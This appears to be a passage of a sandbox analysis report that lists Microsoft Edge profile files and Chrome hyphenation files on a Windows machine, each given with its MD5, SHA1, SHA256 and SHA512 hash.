C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\MANIFEST-000001

MD5 586acef7f88a08bae8ff3d97a38ab316
SHA1 427c7aa31e2d94ea9bfdfa7ae7556d7a6bbf8069
SHA256 9bc8ad7a6eb7e126bbba452910f464c6e1dfd0a112625505bdf45ad467d4cb19
SHA512 0c1991a5c354af153707b8ee26de76dfe3172d2be94ee5a8b1e3bebfed1d3f6ea02f02dcdd657b99f89884da925375022edc6fd977fdab0339f616cab29f9f00

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Well Known Domains\1.2.0.0\well_known_domains.dll

MD5 f5f5b37fd514776f455864502c852773
SHA1 8d5ed434173fd77feb33cb6cb0fad5e2388d97c6
SHA256 2778063e5ded354d852004e80492edb3a0f731b838bb27ba3a233bc937592f6e
SHA512 b0931f1cae171190e6ec8880f4d560cc7b3d5bffe1db11525bd133eaf51e2e0b3c920ea194d6c7577f95e7b4b4380f7845c82eb2898ad1f5c35d4550f93a14b6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 12ccb1df0fd004ac7a4019ba18534987
SHA1 3e4070a1db515851747d9e4217e913b7da5efb72
SHA256 ddddc682560170bd7265fb34fd3dfb468323bbc6c94f23ad3a24936fe3b87230
SHA512 1a2b064f0dbefe4d9d274fc81edb28f178303b2c992acf6f142f360be854dab1674f0ee5005c73872e5fb14c88b35d9585c967b4a7c664590f26402bb79381c9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old

MD5 bb47cb8281cf4b188758865014cbcd4e
SHA1 923fe63a6abe3094356b102b16cfa2d2d149f274
SHA256 d4d3699d9b2aa772d33ccd5bf50323e345a042553108d0b25730d2db7b378e9e
SHA512 464360ecac7e52ffe03a4ed9d5fc3b9748258f03d5a266337ec3745c319f2cb95c072125f67c608bd39046e05a5d1e5f75ed375a0d0d4a186b4510331e9c0ae2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\0276f200-a60f-41f1-959f-ecfcfa87a7e1\index-dir\the-real-index

MD5 0b35ead3858b4c9a6b2f8c7eb0e71adf
SHA1 1db30b60e1d389b09908b5a22c79d3dc25177741
SHA256 b99478a1a54b9c1eb89673a00bd70d2c5507745ad7138d2d99fb4052e805a666
SHA512 b45a486db1c5162180f2c29b0c67efd9a02786c2dca3d0bff70853ad23eea278a1025549b8d48b77730a5353e096224a40843180d5934285164f2558608fbe08

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\0276f200-a60f-41f1-959f-ecfcfa87a7e1\index-dir\the-real-index~RFe5be51d.TMP

MD5 21d63a08aa4713ba0f73614e9e827925
SHA1 a1399ac8d9597e4c39e58c527b13448797b80333
SHA256 667b375618c85cb974781303edbdd4121d3cea9dc97426fbff1ff7ecea6d61ed
SHA512 7e29c6496ad6c9c3716d9460be6ce1bbfa6e6eddad59cd8cd4d27c60f1ed54a3ac535d22fcc92ce221e74893237eadbdd3180a003c0302083b03eb79c8ae840c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

MD5 679a37cd22de1db1d6ed91f3bb5a0cae
SHA1 031766b8ca7567f69830c4a5590c4906b7434385
SHA256 dfc7fda803eae59008a57bd5e73fbc7b045185dda3319654c2d065594c36e907
SHA512 cc2338a6acbf9612e0928d83b9a1b520828e63bce4f56f0232fd90946dc0db823de90808222c9e1ab2855fe5dca2fd022f6cf5c3bc281207ea007d34165aeca9

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-bn.hyb

MD5 8961fdd3db036dd43002659a4e4a7365
SHA1 7b2fa321d50d5417e6c8d48145e86d15b7ff8321
SHA256 c2784e33158a807135850f7125a7eaabe472b3cfc7afb82c74f02da69ea250fe
SHA512 531ecec11d296a1ab3faeb2c7ac619da9d80c1054a2ccee8a5a0cd996346fea2a2fee159ac5a8d79b46a764a2aa8e542d6a79d86b3d7dda461e41b19c9bebe92

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-mr.hyb

MD5 0807cf29fc4c5d7d87c1689eb2e0baaa
SHA1 d0914fb069469d47a36d339ca70164253fccf022
SHA256 f4df224d459fd111698dd5a13613c5bbf0ed11f04278d60230d028010eac0c42
SHA512 5324fd47c94f5804bfa1aa6df952949915896a3fc77dccaed0eeffeafe995ce087faef035aecea6b4c864a16ad32de00055f55260af974f2c41afff14dce00f3

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-nn.hyb
